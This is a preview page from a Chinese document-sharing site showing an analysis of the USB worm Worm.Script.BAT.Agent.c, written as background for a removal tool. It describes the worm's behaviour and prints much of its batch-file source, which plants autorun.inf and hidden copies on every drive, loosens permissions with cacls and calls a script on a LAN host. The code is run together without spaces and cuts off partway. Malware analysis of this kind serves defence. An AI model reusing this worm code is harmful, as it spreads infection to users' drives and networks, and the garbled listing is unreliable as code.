欢迎来到天天文库
浏览记录
ID:22372869
大小:69.50 KB
页数:8页
时间:2018-10-28
《u盘病毒worm.script.bat.agent.c专杀工具》由会员上传分享,免费在线阅读,更多相关内容在学术论文-天天文库。
1、U盘病毒Worm.Script.BAT.Agent.c专杀工具~教育资源库 该病毒为U盘病毒,虽然设计的目的是为了反U盘病毒,但它没有经过用户同意就进行复制,传播,运行。导致系统不稳定,占用大量CPU。 行为分析: 运行后将自身属性修改为系统和隐藏属性。 然后复制往系统根目录。然后再加系统和隐藏属性。 最后还在启动文件夹释放一个病毒主体的VBE文件。 并通过局域网进行传播,自我复制。 在每个盘根目录释放: 2008-02-15.sk Date:2-15-20086:14PM Size:2bytes autorun.i
2、nf Date:2-15-20086:12PM Size:156bytes .bat Date:2-15-20086:08PM Size:3,293bytes .vbe Date:2-15-20086:12PM Size:65bytes 并不断检查autorun.inf有没有经过修改。 .vbe用来启动.bat BAT的内容是: echooff setlocalENABLEDELAYEDEXPANSIONENABLEEXTENSIONS cd/d%~dp0 if/i%cd%==%~d0(explorer.ex
3、e%~d0) setv=01 setendf=%systemdrive%8bye.txt call:ies.vbe echo.NOPQRSTUV call:ql uda.a md%systemroot%bakfiles call:ie%systemroot%bakfiles将文件拖到本图标上以解压还原文件.bat copyuda-解压.bat%systemroot%bakfiles将文件拖到本图标上以解压还原文件.bat call:ie%systemroot%bakfilesuda.a call:copyuda.a%
4、systemroot%bakfiles :s echo.>uhere-%v%.txt ifexist%endf%(setn=1gotoend) if!dl:~%n%,1!==(setn=0s.vbe(ping192.168.2.211-n1call192.168.2.211re$add.bat)) setd=!dl:~%n%,1!: set/an=n+1 ifnotexist%d%(gotos) ifexist%d%autorun.inf(echo.y
5、cacls%d%autorun.inf/peveryone:f
6、 rd%d%autorun.inf/s/q) ifexist%d%autorun.inf(fc%d%autorun.infinf.temifnot!ERRORLEVEL!==0 (callU盘病毒分析.bat-a-l-d%d:~0,-1%-c-i-sgotos1))else(gotos1) ifnotexist%d%%~n0.vbe(gotos2) ifnotexist%d%%~nx0(gotos3) ifnotexist%d%uda.a(gotos4) ifexist%d%%date:~0,10%.sk(gotos) :s
7、1 call:inf>%d%autorun.inf call:ie%d%%~n0.vbe :s2 call:vbe%~nx0>%d%%~n0.vbe attrib%d%%~n0.vbe+a+s+r+h :s3 call:copy%~dpnx0%d% :s4 call:copyuda.a%d% call:ie%d%*.sk echo.>%d%%date:~0,10%.sk attrib%d%%date:~0,10%.sk+a+s+r+h gotos :cb ifexist%systemroot
8、%uhere-*.txt(del/a/f/q%systemroot%uhere123下一页友情提醒:,特别!-*.txts.vbe) ifexist%systemroot%uhere-*.txt(ifexist%systemroot%uhere-%v%.txt(goto:eof) else(call:v%systemroot%uhere-*.txt(if%v%lss!v0!(goto:eof)))) call:rm>%systemdrive%已经被反U盘病毒的病毒感染.txt call:copy%~dpnx0%systemr
9、oot% call:copyuda.a%systemroot% call:ie%systemroot%%~n0.vbe call:vbe%~nx0>%systemroot%%~n0
此文档下载收益归作者所有